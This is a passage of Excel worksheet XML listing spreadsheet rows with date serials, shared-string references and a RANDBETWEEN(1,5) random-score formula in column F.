        <f t="shared" ca="1" si="101"/>
        <v>5</v>
      </c>
    </row>
    <row r="6490" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6490" s="1">
        <v>43435.710972222223</v>
      </c>
      <c r="C6490" t="s">
        <v>2210</v>
      </c>
      <c r="F6490">
        <f t="shared" ca="1" si="101"/>
        <v>2</v>
      </c>
    </row>
    <row r="6491" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6491" s="1">
        <v>43435.64875</v>
      </c>
      <c r="C6491" t="s">
        <v>10</v>
      </c>
      <c r="D6491" t="s">
        <v>112</v>
      </c>
      <c r="E6491" t="s">
        <v>5787</v>
      </c>
      <c r="F6491">
        <f t="shared" ca="1" si="101"/>
        <v>5</v>
      </c>
    </row>
    <row r="6492" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A6492" s="1">
        <v>43435.568298611113</v>
      </c>
      <c r="C6492" t="s">
        <v>48</v>
      </c>
      <c r="E6492" s="2" t="s">
        <v>5788</v>
      </c>
      <c r="F6492">
        <f t="shared" ca="1" si="101"/>
        <v>5</v>
      </c>
    </row>
    <row r="6493" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6493" s="1">
        <v>43435.558854166666</v>
      </c>
      <c r="C6493" t="s">
        <v>301</v>
      </c>
      <c r="E6493" t="s">
        <v>3044</v>
      </c>
      <c r="F6493">
        <f t="shared" ca="1" si="101"/>
        <v>2</v>
      </c>
    </row>
    <row r="6494" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6494" s="1">
        <v>43435.558819444443</v>
      </c>
      <c r="C6494" t="s">
        <v>559</v>
      </c>
      <c r="F6494">
        <f t="shared" ca="1" si="101"/>
        <v>1</v>
      </c>
    </row>
    <row r="6495" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6495" s="1">
        <v>43435.486944444441</v>
      </c>
      <c r="C6495" t="s">
        <v>124</v>
      </c>
      <c r="E6495" t="s">
        <v>5789</v>
      </c>
      <c r="F6495">
        <f t="shared" ca="1" si="101"/>
        <v>2</v>
      </c>
    </row>
    <row r="6496" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6496" s="1">
        <v>43435.465914351851</v>
      </c>
      <c r="C6496" t="s">
        <v>10</v>
      </c>
      <c r="D6496" t="s">
        <v>885</v>
      </c>
      <c r="E6496" s="2" t="s">
        <v>5790</v>
      </c>
      <c r="F6496">
        <f t="shared" ca="1" si="101"/>
        <v>5</v>
      </c>
    </row>
    <row r="6497" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6497" s="1">
        <v>43435.290567129632</v>
      </c>
      <c r="C6497" t="s">
        <v>60</v>
      </c>
      <c r="E6497" t="s">
        <v>5791</v>
      </c>
      <c r="F6497">
        <f t="shared" ca="1" si="101"/>
        <v>4</v>
      </c>
    </row>
    <row r="6498" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6498" s="1">
        <v>43434.847974537035</v>
      </c>
      <c r="C6498" t="s">
        <v>253</v>
      </c>
      <c r="E6498" t="s">
        <v>5792</v>
      </c>
      <c r="F6498">
        <f t="shared" ca="1" si="101"/>
        <v>1</v>
      </c>
    </row>
    <row r="6499" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6499" s="1">
        <v>43434.816874999997</v>
      </c>
      <c r="C6499" t="s">
        <v>140</v>
      </c>
      <c r="D6499" t="s">
        <v>141</v>
      </c>
      <c r="E6499" s="2" t="s">
        <v>5793</v>
      </c>
      <c r="F6499">
        <f t="shared" ca="1" si="101"/>
        <v>2</v>
      </c>
    </row>
    <row r="6500" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6500" s="1">
        <v>43434.775937500002</v>
      </c>
      <c r="C6500" t="s">
        <v>10</v>
      </c>
      <c r="D6500" t="s">
        <v>229</v>
      </c>
      <c r="E6500" t="s">
        <v>5794</v>
      </c>
      <c r="F6500">
        <f t="shared" ca="1" si="101"/>
        <v>4</v>
      </c>
    </row>
    <row r="6501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6501" s="1">
        <v>43434.724143518521</v>
      </c>
      <c r="C6501" t="s">
        <v>10</v>
      </c>
      <c r="D6501" t="s">
        <v>80</v>
      </c>
      <c r="E6501" t="s">
        <v>5795</v>
      </c>
      <c r="F6501">
        <f t="shared" ca="1" si="101"/>
        <v>4</v>
      </c>
    </row>
    <row r="6502" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6502" s="1">
        <v>43434.697222222225</v>
      </c>
      <c r="C6502" t="s">
        <v>10</v>
      </c>
      <c r="D6502" t="s">
        <v>178</v>
      </c>
      <c r="E6502" s="2" t="s">
        <v>5796</v>
      </c>
      <c r="F6502">
        <f t="shared" ca="1" si="101"/>
        <v>5</v>
      </c>
    </row>
    <row r="6503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6503" s="1">
        <v>43434.648009259261</v>
      </c>
      <c r="C6503" t="s">
        <v>10</v>
      </c>
      <c r="D6503" t="s">
        <v>23</v>
      </c>
      <c r="E6503" t="s">
        <v>5797</v>
      </c>
      <c r="F6503">
        <f t="shared" ca="1" si="101"/>
        <v>1</v>
      </c>
    </row>
    <row r="6504" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6504" s="1">
        <v>43434.636979166666</v>
      </c>
      <c r="C6504" t="s">
        <v>60</v>
      </c>
      <c r="E6504" t="s">
        <v>5798</v>
      </c>
      <c r="F6504">
        <f t="shared" ca="1" si="101"/>
        <v>4</v>
      </c>
    </row>
    <row r="6505" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A6505" s="1">
        <v>43434.606504629628</v>
      </c>
      <c r="C6505" t="s">
        <v>6</v>
      </c>
      <c r="D6505" t="s">
        <v>25</v>
      </c>
      <c r="E6505" s="2" t="s">
        <v>5799</v>
      </c>
      <c r="F6505">
        <f t="shared" ca="1" si="101"/>
        <v>5</v>
      </c>
    </row>
    <row r="6506" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6506" s="1">
        <v>43434.604884259257</v>
      </c>
      <c r="C6506" t="s">
        <v>10</v>
      </c>
      <c r="D6506" t="s">
        <v>6</v>
      </c>
      <c r="E6506" t="s">
        <v>5800</v>
      </c>
      <c r="F6506">
        <f t="shared" ca="1" si="101"/>
        <v>4</v>
      </c>
    </row>
    <row r="6507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6507" s="1">
        <v>43434.572708333333</v>
      </c>
      <c r="C6507" t="s">
        <v>5162</v>
      </c>
      <c r="F6507">
        <f t="shared" ca="1" si="101"/>
        <v>4</v>
      </c>
    </row>
    <row r="6508" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6508" s="1">
        <v>43434.548657407409</v>
      </c>
      <c r="C6508" t="s">
        <v>10</v>
      </c>
      <c r="D6508" t="s">
        <v>86</v>
      </c>
      <c r="E6508" t="s">
        <v>5801</v>
      </c>
      <c r="F6508">
        <f t="shared" ca="1" si="101"/>
        <v>3</v>
      </c>
    </row>
    <row r="6509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6509" s="1">
        <v>43434.526817129627</v>
      </c>
      <c r="C6509" t="s">
        <v>5239</v>
      </c>
      <c r="D6509" t="s">
        <v>667</v>
      </c>
      <c r="E6509" t="s">
        <v>4234</v>
      </c>
      <c r="F6509">
        <f t="shared" ca="1" si="101"/>
        <v>1</v>
      </c>
    </row>
    <row r="6510" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6510" s="1">
        <v>43434.50849537037</v>
      </c>
      <c r="C6510" t="s">
        <v>41</v>
      </c>
      <c r="E6510" t="s">
        <v>5802</v>
      </c>
      <c r="F6510">
        <f t="shared" ca="1" si="101"/>
        <v>4</v>
      </c>
    </row>
    <row r="6511" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6511" s="1">
        <v>43434.496712962966</v>
      </c>
      <c r="C6511" t="s">
        <v>10</v>
      </c>
      <c r="D6511" t="s">
        <v>17</v>
      </c>
      <c r="E6511" t="s">
        <v>5803</v>
      </c>
      <c r="F6511">
        <f t="shared" ca="1" si="101"/>
        <v>2</v>
      </c>
    </row>
    <row r="6512" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6512" s="1">
        <v>43434.482268518521</v>
      </c>
      <c r="C6512" t="s">
        <v>10</v>
      </c>
      <c r="D6512" t="s">
        <v>232</v>
      </c>
      <c r="E6512" t="s">
        <v>5804</v>
      </c>
      <c r="F6512">
        <f t="shared" ca="1" si="101"/>
        <v>5</v>
      </c>
    </row>
    <row r="6513" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A6513" s="1">
        <v>43434.446423611109</v>
      </c>
      <c r="C6513" t="s">
        <v>10</v>
      </c>
      <c r="D6513" t="s">
        <v>192</v>
      </c>
      <c r="E6513" s="2" t="s">
        <v>5805</v>
      </c>
      <c r="F6513">
        <f t="shared" ca="1" si="101"/>
        <v>5</v>
      </c>
    </row>
    <row r="6514" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6514" s="1">
        <v>43434.438263888886</v>
      </c>
      <c r="C6514" t="s">
        <v>10</v>
      </c>
      <c r="D6514" t="s">
        <v>20</v>
      </c>
      <c r="E6514" t="s">
        <v>5806</v>
      </c>
      <c r="F6514">
        <f t="shared" ca="1" si="101"/>
        <v>1</v>
      </c>
    </row>
    <row r="6515" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6515" s="1">
        <v>43434.422847222224</v>
      </c>
      <c r="C6515" t="s">
        <v>43</v>
      </c>
      <c r="E6515" s="2" t="s">
        <v>5807</v>
      </c>
      <c r="F6515">
        <f t="shared" ca="1" si="101"/>
        <v>1</v>
      </c>
    </row>
    <row r="6516" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6516" s="1">
        <v>43434.416087962964</v>
      </c>
      <c r="C6516" t="s">
        <v>10</v>
      </c>
      <c r="D6516" t="s">
        <v>20</v>
      </c>
      <c r="E6516" t="s">
        <v>5808</v>
      </c>
      <c r="F6516">
        <f t="shared" ca="1" si="101"/>
        <v>1</v>
      </c>
    </row>
    <row r="6517" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6517" s="1">
        <v>43434.409837962965</v>
      </c>
      <c r="C6517" t="s">
        <v>10</v>
      </c>
      <c r="D6517" t="s">
        <v>52</v>
      </c>
      <c r="E6517" t="s">
        <v>5809</v>
      </c>
      <c r="F6517">
        <f t="shared" ca="1" si="101"/>
        <v>2</v>
      </c>
    </row>
    <row r="6518" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6518" s="1">
        <v>43434.335659722223</v>
      </c>
      <c r="C6518" t="s">
        <v>776</v>
      </c>
      <c r="E6518" s="2" t="s">
        <v>5810</v>
      </c>
      <c r="F6518">
        <f t="shared" ca="1" si="101"/>
        <v>5</v>
      </c>
    </row>
    <row r="6519" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6519" s="1">
        <v>43434.281423611108</v>
      </c>
      <c r="C6519" t="s">
        <v>48</v>
      </c>
      <c r="E6519" t="s">
        <v>5811</v>
      </c>
      <c r="F6519">
        <f t="shared" ca="1" si="101"/>
        <v>4</v>
      </c>
    </row>
    <row r="6520" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6520" s="1">
        <v>43434.274861111109</v>
      </c>
      <c r="C6520" t="s">
        <v>10</v>
      </c>
      <c r="D6520" t="s">
        <v>36</v>
      </c>
      <c r="E6520" t="s">
        <v>5812</v>
      </c>
      <c r="F6520">
        <f t="shared" ca="1" si="101"/>
        <v>5</v>
      </c>
    </row>
    <row r="6521" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6521" s="1">
        <v>43434.26935185185</v>
      </c>
      <c r="C6521" t="s">
        <v>41</v>
      </c>
      <c r="E6521" s="2" t="s">
        <v>5813</v>
      </c>
      <c r="F6521">
        <f t="shared" ca="1" si="101"/>
        <v>4</v>
      </c>
    </row>
    <row r="6522" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6522" s="1">
        <v>43434.256608796299</v>
      </c>
      <c r="C6522" t="s">
        <v>48</v>
      </c>
      <c r="E6522" t="s">
        <v>5814</v>
      </c>
      <c r="F6522">
        <f t="shared" ca="1" si="101"/>
        <v>5</v>
      </c>
    </row>
    <row r="6523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6523" s="1">
        <v>43434.243402777778</v>
      </c>
      <c r="C6523" t="s">
        <v>3443</v>
      </c>
      <c r="E6523" t="s">
        <v>5815</v>
      </c>
      <c r="F6523">
        <f t="shared" ca="1" si="101"/>
        <v>1</v>
      </c>
    </row>
    <row r="6524" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6524" s="1">
        <v>43434.207442129627</v>
      </c>
      <c r="C6524" t="s">
        <v>686</v>
      </c>
      <c r="E6524" t="s">
        <v>5816</v>
      </c>
      <c r="F6524">
        <f t="shared" ca="1" si="101"/>
        <v>2</v>
      </c>
    </row>
    <row r="6525" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6525" s="1">
        <v>43434.137754629628</v>
      </c>
      <c r="C6525" t="s">
        <v>41</v>
      </c>
      <c r="E6525" t="s">
        <v>5817</v>
      </c>
      <c r="F6525">
        <f t="shared" ca="1" si="101"/>
        <v>4</v>
      </c>
    </row>
    <row r="6526" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6526" s="1">
        <v>43434.109872685185</v>
      </c>
      <c r="C6526" t="s">
        <v>559</v>
      </c>
      <c r="E6526" s="2" t="s">
        <v>5818</v>
      </c>
      <c r="F6526">
        <f t="shared" ca="1" si="101"/>
        <v>4</v>
      </c>
    </row>
    <row r="6527" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6527" s="1">
        <v>43433.864074074074</v>
      </c>
      <c r="C6527" t="s">
        <v>4276</v>
      </c>
      <c r="D6527" t="s">
        <v>251</v>
      </c>
      <c r="E6527" t="s">
        <v>5819</v>
      </c>
      <c r="F6527">
        <f t="shared" ca="1" si="101"/>
        <v>4</v>
      </c>
    </row>
    <row r="6528" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6528" s="1">
        <v>43433.862743055557</v>
      </c>
      <c r="C6528" t="s">
        <v>10</v>
      </c>
      <c r="D6528" t="s">
        <v>817</v>
      </c>
      <c r="E6528" s="2" t="s">
        <v>5820</v>
      </c>
      <c r="F6528">
        <f t="shared" ca="1" si="101"/>
        <v>1</v>
      </c>
    </row>
    <row r="6529" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6529" s="1">
        <v>43433.855763888889</v>
      </c>
      <c r="C6529" t="s">
        <v>10</v>
      </c>
      <c r="D6529" t="s">
        <v>6</v>
      </c>
      <c r="E6529" t="s">
        <v>5821</v>
      </c>
      <c r="F6529">
        <f t="shared" ca="1" si="101"/>
        <v>2</v>
      </c>
    </row>
    <row r="6530" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6530" s="1">
        <v>43433.829861111109</v>
      </c>
      <c r="C6530" t="s">
        <v>226</v>
      </c>
      <c r="D6530" t="s">
        <v>244</v>
      </c>
      <c r="E6530" t="s">
        <v>3815</v>
      </c>
      <c r="F6530">
        <f t="shared" ref="F6530:F6593" ca="1" si="102">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="6531" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6531" s="1">
        <v>43433.814363425925</v>
      </c>
      <c r="C6531" t="s">
        <v>144</v>
      </c>
      <c r="E6531" t="s">
        <v>5822</v>
      </c>
      <c r="F6531">
        <f t="shared" ca="1" si="102"/>
        <v>2</v>
      </c>
    </row>
    <row r="6532" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6532" s="1">
        <v>43433.762256944443</v>
      </c>
      <c r="C6532" t="s">
        <v>48</v>
      </c>
      <c r="E6532" t="s">
        <v>5823</v>
      </c>
      <c r="F6532">
        <f t="shared" ca="1" si="102"/>
        <v>3</v>
      </c>
    </row>
    <row r="6533" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6533" s="1">
        <v>43433.713055555556</v>
      </c>
      <c r="C6533" t="s">
        <v>10</v>
      </c>
      <c r="D6533" t="s">
        <v>6</v>
      </c>
      <c r="E6533" t="s">
        <v>5824</v>
      </c>
      <c r="F6533">
        <f t="shared" ca="1" si="102"/>
        <v>4</v>
      </c>
    </row>
    <row r="6534" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6534" s="1">
        <v>43433.713067129633</v>
      </c>
      <c r="C6534" t="s">
        <v>10</v>
      </c>
      <c r="D6534" t="s">
        <v>6</v>
      </c>
      <c r="E6534" t="s">
        <v>5825</v>
      </c>
      <c r="F6534">
        <f t="shared" ca="1" si="102"/>
        <v>3</v>
      </c>
    </row>
    <row r="6535" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6535" s="1">
        <v>43433.700578703705</v>
      </c>
      <c r="C6535" t="s">
        <v>10</v>
      </c>
      <c r="D6535" t="s">
        <v>271</v>
      </c>
      <c r="E6535" t="s">
        <v>5826</v>
      </c>
      <c r="F6535">
        <f t="shared" ca="1" si="102"/>
        <v>2</v>
      </c>
    </row>
    <row r="6536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6536" s="1">
        <v>43433.685659722221</v>
      </c>
      <c r="C6536" t="s">
        <v>10</v>
      </c>
      <c r="D6536" t="s">
        <v>112</v>
      </c>
      <c r="E6536" t="s">
        <v>5827</v>
      </c>
      <c r="F6536">
        <f t="shared" ca="1" si="102"/>
        <v>5</v>
      </c>
    </row>
    <row r="6537" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6537" s="1">
        <v>43433.683680555558</v>
      </c>
      <c r="C6537" t="s">
        <v>5022</v>
      </c>
      <c r="D6537" t="s">
        <v>667</v>
      </c>
      <c r="E6537" t="s">
        <v>5819</v>
      </c>
      <c r="F6537">
        <f t="shared" ca="1" si="102"/>
        <v>5</v>
      </c>
    </row>
    <row r="6538" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6538" s="1">
        <v>43433.666481481479</v>
      </c>
      <c r="C6538" t="s">
        <v>10</v>
      </c>
      <c r="D6538" t="s">
        <v>163</v>
      </c>
      <c r="E6538" t="s">
        <v>5828</v>
      </c>
      <c r="F6538">
        <f t="shared" ca="1" si="102"/>
        <v>4</v>
      </c>
    </row>
    <row r="6539" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6539" s="1">
        <v>43433.666400462964</v>
      </c>
      <c r="C6539" t="s">
        <v>10</v>
      </c>
      <c r="D6539" t="s">
        <v>163</v>
      </c>
      <c r="E6539" t="s">
        <v>5828</v>
      </c>
      <c r="F6539">
        <f t="shared" ca="1" si="102"/>
        <v>5</v>
      </c>
    </row>
    <row r="6540" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6540" s="1">
        <v>43433.656365740739</v>
      </c>
      <c r="C6540" t="s">
        <v>10</v>
      </c>
      <c r="D6540" t="s">
        <v>80</v>
      </c>
      <c r="E6540" t="s">
        <v>5829</v>
      </c>
      <c r="F6540">
        <f t="shared" ca="1" si="102"/>
        <v>4</v>
      </c>
    </row>
    <row r="6541" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6541" s="1">
        <v>43433.649143518516</v>
      </c>
      <c r="C6541" t="s">
        <v>10</v>
      </c>
      <c r="D6541" t="s">
        <v>52</v>
      </c>
      <c r="E6541" t="s">
        <v>5830</v>
      </c>
      <c r="F6541">
        <f t="shared" ca="1" si="102"/>
        <v>3</v>
      </c>
    </row>
    <row r="6542" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6542" s="1">
        <v>43433.640474537038</v>
      </c>
      <c r="C6542" t="s">
        <v>10</v>
      </c>
      <c r="D6542" t="s">
        <v>41</v>
      </c>
      <c r="E6542" t="s">
        <v>5831</v>
      </c>
      <c r="F6542">
        <f t="shared" ca="1" si="102"/>
        <v>1</v>
      </c>
    </row>
    <row r="6543" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6543" s="1">
        <v>43433.639722222222</v>
      </c>
      <c r="C6543" t="s">
        <v>10</v>
      </c>
      <c r="D6543" t="s">
        <v>52</v>
      </c>
      <c r="E6543" t="s">
        <v>5832</v>
      </c>
      <c r="F6543">
        <f t="shared" ca="1" si="102"/>
        <v>5</v>
      </c>
    </row>
    <row r="6544" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6544" s="1">
        <v>43433.618958333333</v>
      </c>
      <c r="C6544" t="s">
        <v>10</v>
      </c>
      <c r="D6544" t="s">
        <v>89</v>
      </c>
      <c r="E6544" t="s">
        <v>5833</v>
      </c>
      <c r="F6544">
        <f t="shared" ca="1" si="102"/>
        <v>3</v>
      </c>
    </row>
    <row r="6545" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6545" s="1">
        <v>43433.614328703705</v>
      </c>
      <c r="C6545" t="s">
        <v>10</v>
      </c>
      <c r="D6545" t="s">
        <v>263</v>
      </c>
      <c r="E6545" s="2" t="s">
        <v>5834</v>
      </c>
      <c r="F6545">
        <f t="shared" ca="1" si="102"/>
        <v>5</v>
      </c>
    </row>
    <row r="6546" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6546" s="1">
        <v>43433.593124999999</v>
      </c>
      <c r="C6546" t="s">
        <v>10</v>
      </c>
      <c r="D6546" t="s">
        <v>36</v>
      </c>
      <c r="E6546" s="2" t="s">
        <v>5835</v>
      </c>
      <c r="F6546">
        <f t="shared" ca="1" si="102"/>
        <v>4</v>
      </c>
    </row>
    <row r="6547" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6547" s="1">
        <v>43433.58865740741</v>
      </c>
      <c r="C6547" t="s">
        <v>10</v>
      </c>
      <c r="D6547" t="s">
        <v>89</v>
      </c>
      <c r="E6547" t="s">
        <v>5836</v>
      </c>
      <c r="F6547">
        <f t="shared" ca="1" si="102"/>
        <v>1</v>
      </c>
    </row>
    <row r="6548" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6548" s="1">
        <v>43433.585046296299</v>
      </c>
      <c r="C6548" t="s">
        <v>10</v>
      </c>
      <c r="D6548" t="s">
        <v>6</v>
      </c>
      <c r="E6548" t="s">
        <v>5837</v>
      </c>
      <c r="F6548">
        <f t="shared" ca="1" si="102"/>
        <v>5</v>
      </c>
    </row>
    <row r="6549" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6549" s="1">
        <v>43433.574652777781</v>
      </c>
      <c r="C6549" t="s">
        <v>10</v>
      </c>
      <c r="D6549" t="s">
        <v>17</v>
      </c>
      <c r="E6549" t="s">
        <v>5838</v>
      </c>
      <c r="F6549">
        <f t="shared" ca="1" si="102"/>
        <v>3</v>
      </c>
    </row>
    <row r="6550" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6550" s="1">
        <v>43433.572048611109</v>
      </c>
      <c r="C6550" t="s">
        <v>6</v>
      </c>
      <c r="D6550" t="s">
        <v>25</v>
      </c>
      <c r="F6550">
        <f t="shared" ca="1" si="102"/>
        <v>5</v>
      </c>
    </row>
    <row r="6551" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6551" s="1">
        <v>43433.564664351848</v>
      </c>
      <c r="C6551" t="s">
        <v>10</v>
      </c>
      <c r="D6551" t="s">
        <v>6</v>
      </c>
      <c r="E6551" s="2" t="s">
        <v>5839</v>
      </c>
      <c r="F6551">
        <f t="shared" ca="1" si="102"/>
        <v>2</v>
      </c>
    </row>
    <row r="6552" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6552" s="1">
        <v>43433.564629629633</v>
      </c>
      <c r="C6552" t="s">
        <v>10</v>
      </c>
      <c r="D6552" t="s">
        <v>6</v>
      </c>
      <c r="E6552" s="2" t="s">
        <v>5839</v>
      </c>
      <c r="F6552">
        <f t="shared" ca="1" si="102"/>
        <v>1</v>
      </c>
    </row>
    <row r="6553" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6553" s="1">
        <v>43433.55809027778</v>
      </c>
      <c r="C6553" t="s">
        <v>10</v>
      </c>
      <c r="D6553" t="s">
        <v>6</v>
      </c>
      <c r="E6553" s="2" t="s">
        <v>5840</v>
      </c>
      <c r="F6553">
        <f t="shared" ca="1" si="102"/>
        <v>5</v>
      </c>
    </row>
    <row r="6554" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6554" s="1">
        <v>43433.556493055556</v>
      </c>
      <c r="C6554" t="s">
        <v>10</v>
      </c>
      <c r="D6554" t="s">
        <v>89</v>
      </c>
      <c r="E6554" t="s">
        <v>5841</v>
      </c>
      <c r="F6554">
        <f t="shared" ca="1" si="102"/>
        <v>2</v>
      </c>
    </row>
    <row r="6555" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6555" s="1">
        <v>43433.555104166669</v>
      </c>
      <c r="C6555" t="s">
        <v>10</v>
      </c>
      <c r="D6555" t="s">
        <v>163</v>
      </c>
      <c r="E6555" s="2" t="s">
        <v>5842</v>
      </c>
      <c r="F6555">
        <f t="shared" ca="1" si="102"/>
        <v>5</v>
      </c>
    </row>
    <row r="6556" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6556" s="1">
        <v>43433.53429398148</v>
      </c>
      <c r="C6556" t="s">
        <v>5162</v>
      </c>
      <c r="E6556" t="s">
        <v>5843</v>
      </c>
      <c r="F6556">
        <f t="shared" ca="1" si="102"/>
        <v>5</v>
      </c>
    </row>
    <row r="6557" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6557" s="1">
        <v>43433.518807870372</v>
      </c>
      <c r="C6557" t="s">
        <v>6</v>
      </c>
      <c r="D6557" t="s">
        <v>194</v>
      </c>
      <c r="E6557" t="s">
        <v>5844</v>
      </c>
      <c r="F6557">
        <f t="shared" ca="1" si="102"/>
        <v>3</v>
      </c>
    </row>
    <row r="6558" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6558" s="1">
        <v>43433.515648148146</v>
      </c>
      <c r="C6558" t="s">
        <v>10</v>
      </c>
      <c r="D6558" t="s">
        <v>36</v>
      </c>
      <c r="E6558" t="s">
        <v>5845</v>
      </c>
      <c r="F6558">
        <f t="shared" ca="1" si="102"/>
        <v>3</v>
      </c>
    </row>
    <row r="6559" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6559" s="1">
        <v>43433.502129629633</v>
      </c>
      <c r="C6559" t="s">
        <v>10</v>
      </c>
      <c r="D6559" t="s">
        <v>36</v>
      </c>
      <c r="F6559">
        <f t="shared" ca="1" si="102"/>
        <v>2</v>
      </c>
    </row>
    <row r="6560" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6560" s="1">
        <v>43433.501504629632</v>
      </c>
      <c r="C6560" t="s">
        <v>10</v>
      </c>
      <c r="D6560" t="s">
        <v>36</v>
      </c>
      <c r="E6560" t="s">
        <v>5846</v>
      </c>
      <c r="F6560">
        <f t="shared" ca="1" si="102"/>
        <v>2</v>
      </c>
    </row>
    <row r="6561" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6561" s="1">
        <v>43433.490439814814</v>
      </c>
      <c r="C6561" t="s">
        <v>6</v>
      </c>
      <c r="D6561" t="s">
        <v>194</v>
      </c>
      <c r="E6561" t="s">
        <v>5847</v>
      </c>
      <c r="F6561">
        <f t="shared" ca="1" si="102"/>
        <v>2</v>
      </c>
    </row>
    <row r="6562" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6562" s="1">
        <v>43433.488171296296</v>
      </c>
      <c r="C6562" t="s">
        <v>10</v>
      </c>
      <c r="D6562" t="s">
        <v>86</v>
      </c>
      <c r="E6562" t="s">
        <v>5848</v>
      </c>
      <c r="F6562">
        <f t="shared" ca="1" si="102"/>
        <v>3</v>
      </c>
    </row>
    <row r="6563" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A6563" s="1">
        <v>43433.483460648145</v>
      </c>
      <c r="C6563" t="s">
        <v>50</v>
      </c>
      <c r="E6563" s="2" t="s">
        <v>5849</v>
      </c>
      <c r="F6563">
        <f t="shared" ca="1" si="102"/>
        <v>5</v>
      </c>
    </row>
    <row r="6564" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6564" s="1">
        <v>43433.473715277774</v>
      </c>
      <c r="C6564" t="s">
        <v>10</v>
      </c>
      <c r="D6564" t="s">
        <v>244</v>
      </c>
      <c r="E6564" t="s">
        <v>5850</v>
      </c>
      <c r="F6564">
        <f t="shared" ca="1" si="102"/>
        <v>5</v>
      </c>
    </row>
    <row r="6565" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6565" s="1">
        <v>43433.419502314813</v>
      </c>
      <c r="C6565" t="s">
        <v>10</v>
      </c>
      <c r="D6565" t="s">
        <v>271</v>
      </c>
      <c r="E6565" t="s">
        <v>5851</v>
      </c>
      <c r="F6565">
        <f t="shared" ca="1" si="102"/>
        <v>3</v>
      </c>
    </row>
    <row r="6566" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6566" s="1">
        <v>43433.368761574071</v>
      </c>
      <c r="C6566" t="s">
        <v>69</v>
      </c>
      <c r="E6566" s="2" t="s">
        <v>5852</v>
      </c>
      <c r="F6566">
        <f t="shared" ca="1" si="102"/>
        <v>4</v>
      </c>
    </row>
    <row r="6567" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6567" s="1">
        <v>43433.355717592596</v>
      </c>
      <c r="C6567" t="s">
        <v>3049</v>
      </c>
      <c r="E6567" t="s">
        <v>5853</v>
      </c>
      <c r="F6567">
        <f t="shared" ca="1" si="102"/>
        <v>2</v>
      </c>
    </row>
    <row r="6568" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A6568" s="1">
        <v>43433.312534722223</v>
      </c>
